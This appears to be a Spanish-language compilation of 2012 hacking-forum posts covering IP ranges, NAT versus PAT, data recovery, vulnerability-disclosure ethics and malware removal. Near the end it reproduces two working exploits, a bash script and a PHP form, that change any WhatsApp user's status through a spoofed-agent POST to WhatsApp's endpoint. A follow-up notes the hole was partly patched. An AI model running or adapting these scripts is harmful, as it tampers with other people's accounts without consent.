Mensajes

Wow, no, eso no es un rango.

Esa es una ip 127.0.0.1 con una máscara de subred 255.255.255.255, es decir una sola ip 127.0.0.1

Los rangos de ip privadas, 10.0.0.0/16 en clase A 127.0.0.0 en clase B y 192.168.0.0 en clase C no se pueden utlizar para IPs públicas

Aquí tienes el rango de ip's que usa cada ISP (AS)

http://bgp.he.net/

[NO]

Anonymous NO atacará Facebook el próximo 28 de enero

https://twitter.com/#!/anonops/status/161535637542019072

Again we must say that we will not attack #Facebook! Again the mass media lie.

Algunos periodistas no dan ni una.

We have NO affiliation with this site, and by the looks of it, this is a SCAM -

https://twitter.com/#!/anonops/status/161791850586451968

http://t.co/4kd9jtts

Añadido mirror descarga:

http://ns2.elhacker.net/MITM.pdf

Añadida entrada en el blog:

http://blog.elhacker.net/2012/01/ataque-man-in-middle-en-redes-locales.html

[Hiren's BootCD - CD Autoarrancable Recuperación SOS]

buf parece que el disco está bastante dañado. Pero si todavía lo reconoce la BIOS y el programa PhotoRec o el TestDisk, buena señal...

Pero si salen errores o se ha quedado colgado, mejor para e intenta de nuevo.

O mira el Hiren's BootCD que incluye el programa:

Unstoppable Copier 5.2: Allows you to copy files from disks with problems such as bad sectors, scratches or that just give errors when reading data (Windows Freeware).

Hiren's BootCD - CD Autoarrancable Recuperación SOS
http://foro.elhacker.net/software/hirens_bootcd_cd_autoarrancable_recuperacion_sos-t139246.0.html

[Just remember that both NAT and PAT use at least one IP address and that PAT is also referred to as NAT overloading because it uses one IP address for all clients to multiple ports, whereas standard NAT uses a one-to-one IP address relationship per client.]

No sé, la verdad es que yo tampoco entiendo poque es mejor NAT que PAT, cuando teóricamente es mejor al revés (a mi entender).

NAT overloading

Las traducciones NAT se pueden usar para una variedad de propósitos y pueden asignarse de manera dinámica o estática. NAT estática está diseñada para permitir que cada dirección local se mapee a su correspondiente dirección global. Esto resulta particularmente útil para los hosts que deban tener una dirección constante que esté accesible desde la Internet. Estos hosts internos pueden ser servidores de empresas o dispositivos de networking.

NAT dinámica está diseñada para mapear una dirección IP privada a una dirección pública. Cualquier dirección IP de un conjunto de direcciones IP públicas se asigna a un host de red. La sobrecarga, o Traducción de direcciones de puerto (PAT), mapea varias direcciones IP privadas a una sola dirección IP pública. Se pueden mapear varias direcciones a una sola dirección porque cada dirección privada se diferencia por el número de puerto.

PAT utiliza números únicos de puerto origen en la dirección IP global interna para distinguir entre las traducciones. El número de puerto se codifica en 16 bits. En teoría, el número total de direcciones internas que se pueden traducir a una dirección externa podría ser hasta 65,536 por dirección IP . En realidad, el número de puertos que se pueden asignar a una sola dirección IP es aproximadamente 4000. PAT intenta preservar el puerto origen original. Si el puerto origen está en uso, PAT asigna el primer número de puerto disponible comenzando desde el principio del grupo de puertos correspondiente 0-511, 512-1023, o 1024-65535. Cuando no hay más puertos disponibles y hay más de una dirección IP externa configurada,
PAT utiliza la próxima dirección IP para tratar de asignar nuevamente el puerto origen original. Este proceso continúa hasta que no haya puertos ni direcciones IP externas disponibles.

NAT ofrece las siguientes ventajas:

• Elimina la reasignación de una nueva dirección IP a cada host cuando se cambia a un nuevo ISP. NAT elimina la necesidad de re-direccionar todos los hosts que requieran acceso externo, ahorrando tiempo y dinero.

• Conserva las direcciones mediante la multiplexión a nivel de puerto de la aplicación. Con PAT, los hosts internos pueden compartir una sola dirección IP pública para toda comunicación externa. En este tipo de configuración, se requieren muy pocas direcciones externas para admitir muchos hosts internos, y de este modo se conservan las direcciones IP

• Protege la seguridad de la red. Debido a que las redes privadas no publican sus direcciones o topología interna, ellas son razonablemente seguras cuando se las utiliza en conjunto con NAT para tener un acceso externo controlado.

Network Address Translation (NAT) and Port Address Translation (PAT) both map IP addresses on an internal network to IP addresses on an external network. Which method of address translation you use depends on the types of networks that you are translating and the number of available IP addresses that you have.

If you are connecting a site in the 10.10.10.0 network to a site in the 10.10.20.0 network, you could use NAT to translate 10.10.10.0 IP addresses to available 10.10.20.0 IP addresses so that hosts on the 10.10.10.0 network can access data and use network resources on the 10.10.20.0 network. However, for this scenario to work, you must have an address pool that contains enough available IP addresses on the 10.10.20.0 network to accommodate every host on the 10.10.10.0 network, because NAT requires a one-to-one relationship when translating IP addresses.

PAT attempts to use the original source port number of the internal host to form a unique, registered IP address and port number combination. For example, two hosts that have been assigned the IP addresses 10.10.10.100 and 10.10.10.101, respectively, could send traffic to and receive traffic from the Internet by using the single public IP address 123.45.67.89. If that port number is already allocated, PAT searches for an available alternate source port number. Therefore, the host at IP address 10.10.10.100 could access the Internet by using the public IP address and source port combination of 123.45.67.89:10000. Meanwhile, the host at IP address 10.10.10.101 could access the Internet by using the IP address and source port combination of 123.45.67.89:10001.

If you are connecting a site in the 10.10.10.0 network to the Internet, you must translate host IPs on that network to a registered IP address that is routable over the Internet. In order to use traditional NAT in this scenario, you would need to purchase a registered IP address for each host on your internal network. Alternatively, you could use PAT to translate all the IP addresses on the internal network to a single, shared IP address that connects to the Internet. PAT, which is also known as NAT overloading, uses 16-bit source port numbers to map and track traffic between an internal host and the Internet.

As you can see, the first letter in each acronym denotes the difference between NAT (Network Address Translation) and PAT (Port Address Translation), which should make it easier for you to remember which does what. Just remember that both NAT and PAT use at least one IP address and that PAT is also referred to as NAT overloading because it uses one IP address for all clients to multiple ports, whereas standard NAT uses a one-to-one IP address relationship per client.

[youtube=425,350]http://www.youtube.com/watch?v=BI5ml-lcKU8[/youtube]

me interesa tu proyecto, suena muy interesante.

Aunque tu idea ya existe e incluso es más compleja (cifra los archivos, sincroniza, etc)

http://www.syncany.org/

Aunque veo que todavía no hay download posible jeje

Justamente estaba leyendo los comentarios de esta entrada en meneame sobre el tema:

http://www.meneame.net/story/alternativa-dropbox-megaupload-etc-open-source-empresas

- OpenDocMan (www.opendocman.com/)

Yo podría ofrecer el hosting de pruebas.

lo más complicado sería el cableado, pasar un cable de red de un piso a otro, tendrás que usar el hueco de la escalera y el cable de red es gordo, para luego entrar por dónde entra el del teléfono.

Otra opción sería hacerlo mediante wifi, pero necesitarás varios amplificadores. Me gusta tu idea, de simplemente hacer la red pero que internet cada uno pague lo suyo, porque para repartir equitativamente la conexión a internet ya es más complicado y no siempre funciona bien.

[Deberia publicar una vulnerabilidad muy seria?]

No es legal, sigue siendo una intrusión aunque no hagas uso de la información obtenida. Lógicamente no sería tan grave, porque no has hecho ningún mal uso de la información, y recuerda que siempre la última palabra la tiene el juez.

Hay muchas opiniones al respecto qué hacer cuando se encuentra una vulerabilidad, repotar, callar, denunciar, avisar, cuánto tiempo esperar a que lo arreglen, full disclosoure o no, etc.

Deberia publicar una vulnerabilidad muy seria?
http://foro.elhacker.net/foro_libre/deberia_publicar_una_vulnerabilidad_muy_seria-t328814.0.html

¿Security Through Obscurity o Full Disclosure?
http://foro.elhacker.net/hacking_avanzado/iquestsecurity_through_obscurity_o_full_disclosure-t36775.0.html

FAQ de Advisories
http://foro.elhacker.net/bugs_y_exploits/faq_de_advisories-t247917.0.html

Como dar el reporte de una vulnerabilidad?
http://foro.elhacker.net/nivel_web/como_dar_el_reporte_de_una_vulnerabilidad-t231936.0.html

[n]

tu ordenador está infecatdo por un malware/spyware que además tiene un nombre muy cutre Systen32.exe xDD

Inicia el Windows en modo a prueba de fallos o bien inicia el ordenador con una versión live-cd que contenga una antivirus para poder eliminar el spyware.

En el subforo de seguridad tienes varios temas pegados de cómo hacerlo.

Código (bash) [Seleccionar] Expandir

#!/bin/bash
#
# WhatsApp Status changer v0.2 stable
# A slim exploit able to change the WhatsApp
# user status in a remote way.
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
 
show_help(){
 echo ""
 echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
 echo ""
 echo " --usage    show the exploit Usage"
 echo " --credits  show the exploit Credits"
 echo " --help     show the Help"
 echo ""
 echo " enJoy"
}
 
show_credits(){
 echo ""
 echo " Emanuele Gentili"
 echo " http://www.emanuelegentili.eu"
 echo " eg @ offensive-security.it"
 echo ""
 echo " Stefano Fratepietro"
 echo " http://steve.deftlinux.net"
 echo " stefano @ deftlinux.net"
 echo ""

}
 
show_usage(){
 echo ""
 echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
 echo ""
 echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
 echo ""
 echo " enJoy"
}


# Bash
while [[ $# != 0 ]]; do
   arg_name=$1; shift
   case "$arg_name" in
     --help|-?|-h) show_help; exit 0;;
     --credits) show_credits; exit 0;;
     --usage) show_usage; exit 0;;
     --countrycode) countrycode=$1; shift;;
     --mobilenum) mobilenum=$2; shift;;
     --text) text=$3; shift;;
     *) echo "invalid option: $1"; show_help;exit 1;;
   esac
done
 
[ -z "$countrycode" ] && { show_help; exit 1; }

whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"

wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php

echo ""
echo "[+] Operazione completata."
echo ""


http://www.exploit-db.com/exploits/18396/

PHP

Código (php) [Seleccionar] Expandir

<form method="post">

    <dl>
        <dt>Country code: (example: 31)</dt>
        <dd><input type="text" name="cc" value="31" /></dd>
        <dt>Phonenumber: (example: +31612345678)</dt>
        <dd><input type="text" name="n" value="+316" /></dd>
        <dt>New status:</dt>
        <dd><input type="text" name="m" /></dd>
        <dd><input type="submit" value="Change!" /></dd>
    </dl>

</form>

<?php
ini_set('display_errors',0);
error_reporting(E_ALL|E_STRICT);
 
if ( $_SERVER['REQUEST_METHOD'] === 'POST' ) 
{
    $url = 'https://s.whatsapp.net/client/iphone/u.php';
    $fields = array(
        'cc' => urlencode($_POST['cc']),
        'me' => urlencode($_POST['n']),
        's'  => urlencode(stripslashes(utf8_decode($_POST['m'])))
    );
 
    //url-ify the data for the POST
    foreach ($fields as $key=>$value) {
        $fields_string .= $key . '=' . $value . '&';
    }
    rtrim($fields_string, '&');
 
    //open connection
    $ch = curl_init();
 
    //set the url, number of POST vars, POST data
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, count($fields));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_USERAGENT, "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)");
 
    //execute post
    $result = curl_exec($ch);
 
    //close connection
    curl_close($ch);
 
}
?>

Ya no funciona:

WhatsApp implemented an IP check – so this doesn't work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).

http://whatsappfail.net/index.php?option=com_content&view=article&id=2&catid=9&Itemid=121

http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/